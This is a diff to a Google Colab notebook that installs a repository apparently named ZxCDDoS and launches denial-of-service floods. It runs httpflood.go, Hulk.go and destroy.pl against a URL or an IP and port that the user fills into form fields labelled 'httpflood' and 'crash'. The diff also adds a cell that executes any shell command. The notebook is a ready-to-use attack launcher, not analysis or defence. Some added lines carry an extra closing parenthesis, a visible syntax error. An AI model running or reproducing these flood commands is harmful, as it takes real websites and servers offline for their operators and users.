--- a/colab.ipynb
+++ b/colab.ipynb
@@ -4,7 +4,7 @@
   "metadata": {
     "colab": {
       "provenance": [],
-      "authorship_tag": "ABX9TyNz6kIpG+b3UdKmXDK/58H2",
+      "authorship_tag": "ABX9TyO7eJb9kL3n/kq4OrR6eLCQ",
       "include_colab_link": true
     },
     "kernelspec": {
@@ -30,10 +30,16 @@
       "cell_type": "code",
       "execution_count": null,
       "metadata": {
-        "id": "k6eqsjp9Un1a"
+        "id": "k6eqsjp9Un1a",
+        "cellView": "form"
       },
       "outputs": [],
       "source": [
+        "\n",
+        "#@title **Download**\n",
+        "#@markdown  Download And Setup\n",
+        "\n",
+        "\n",
         "\n",
         "import subprocess\n",
         "\n",
@@ -42,6 +48,7 @@
         "    \"git clone https://github.com/nalayakofficial/ZxCDDoS\",\n",
         "    \"pip install -r ZxCDDoS/requirements.txt\",\n",
         "    \"apt install golang\",\n",
+        "    \"apt install python2\"\n",
         "]\n",
         "\n",
         "for command in commands:\n",
@@ -52,10 +59,15 @@
       "cell_type": "code",
       "source": [
         "\n",
+        "#@title **httpflood**\n",
+        "#@markdown  Flood Http\n",
+        "\n",
+        "\n",
+        "\n",
         "import subprocess\n",
         "\n",
-        "url = input(\"Enter Url : \")\n",
-        "time = input(\"Enter Time : \")\n",
+        "url = \"\" #@param {type:\"string\"}\n",
+        "time = 600 #@param {type: \"integer\"}\n",
         "commands = [\n",
         "    \"cd ZxCDDoS\",\n",
         "    f'go run httpflood.go {url} 100000 get {time} nil &'\n",
@@ -66,7 +78,8 @@
         "    subprocess.call(command, shell=True)"
       ],
       "metadata": {
-        "id": "59VMC_UfWeIV"
+        "id": "59VMC_UfWeIV",
+        "cellView": "form"
       },
       "execution_count": null,
       "outputs": []
@@ -75,9 +88,14 @@
       "cell_type": "code",
       "source": [
         "\n",
+        "#@title **crash**\n",
+        "#@markdown  Crash\n",
+        "\n",
+        "\n",
+        "\n",
         "import subprocess\n",
         "\n",
-        "url = input(\"Enter Url : \")\n",
+        "url = \"\" #@param {type:\"string\"}\n",
         "commands = [\n",
         "    \"cd ZxCDDoS\",\n",
         "    f'go run Hulk.go -site {url} -data GET &'\n",
@@ -88,7 +106,8 @@
         "    subprocess.call(command, shell=True)"
       ],
       "metadata": {
-        "id": "jzn6iRTUZJ72"
+        "id": "jzn6iRTUZJ72",
+        "cellView": "form"
       },
       "execution_count": null,
       "outputs": []
@@ -97,10 +116,16 @@
       "cell_type": "code",
       "source": [
         "\n",
+        "#@title **crash**\n",
+        "#@markdown  Crash\n",
+        "\n",
+        "\n",
+        "\n",
         "import subprocess\n",
         "\n",
-        "ip = input(\"Enter ip : \")\n",
-        "port = input(\"Enter Port : \")\n",
+        "\n",
+        "ip = \"\" #@param {type:\"string\"}\n",
+        "port = \"\" #@param {type:\"string\"}\n",
         "commands = [\n",
         "    \"cd ZxCDDoS\",\n",
         "    f'perl destroy.pl {ip} {port} 65500 600 &'\n",
@@ -108,10 +133,41 @@
         "]\n",
         "\n",
         "for command in commands:\n",
-        "    subprocess.call(command, shell=True)"
+        "    subprocess.call(command, shell=True))"
       ],
       "metadata": {
-        "id": "Xz_9fELhZfc8"
+        "id": "Xz_9fELhZfc8",
+        "cellView": "form"
+      },
+      "execution_count": null,
+      "outputs": []
+    },
+    {
+      "cell_type": "code",
+      "source": [
+        "\n",
+        "#@title **Custom**\n",
+        "#@markdown  Custom\n",
+        "\n",
+        "\n",
+        "\n",
+        "import subprocess\n",
+        "\n",
+        "\n",
+        "command = \"\" #@param {type:\"string\"}\n",
+        "\n",
+        "commands = [\n",
+        "    \"cd ZxCDDoS\",\n",
+        "    command,\n",
+        "    \"echo Started\",\n",
+        "]\n",
+        "\n",
+        "for command in commands:\n",
+        "    subprocess.call(command, shell=True))"
+      ],
+      "metadata": {
+        "cellView": "form",
+        "id": "0T_dp0dXdehq"
       },
       "execution_count": null,
       "outputs": []
